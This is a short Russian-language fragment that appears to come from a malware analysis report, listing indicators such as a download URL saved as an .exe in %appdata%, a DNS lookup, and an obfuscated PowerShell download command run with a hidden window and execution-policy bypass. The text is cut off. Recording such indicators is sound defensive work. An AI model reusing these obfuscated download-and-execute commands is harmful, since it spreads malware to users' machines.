Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wER^S^HEL^L^.eXe -eX^ECuT^iOnPoliCy^ ^byPa^sS ^-NOPR^O^Fi^LE -^WI^nd^oWSTY^le^ ^HidDe^N (^N^eW-^Ob^Je^c^t ^sYS^Tem.NET.w^EbC^l^IEN^T).D^Ow^NL^O^Adf^I^L^E^(^'http://sutrapon...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "PO^wER^S^HEL^L^.eXe -eX^ECuT^iOnPoliCy^ ^byPa^sS ^-NOPR^O^Fi^LE -^WI^nd^oWSTY^le^ ^HidDe^N (^N^eW-^Ob^Je^c^t ^sYS^Tem.NET.w^EbC^l^IEN^T).D^Ow^NL^O^Adf^I^L^E^(^'http://sutrapon...' (со скрытым окном)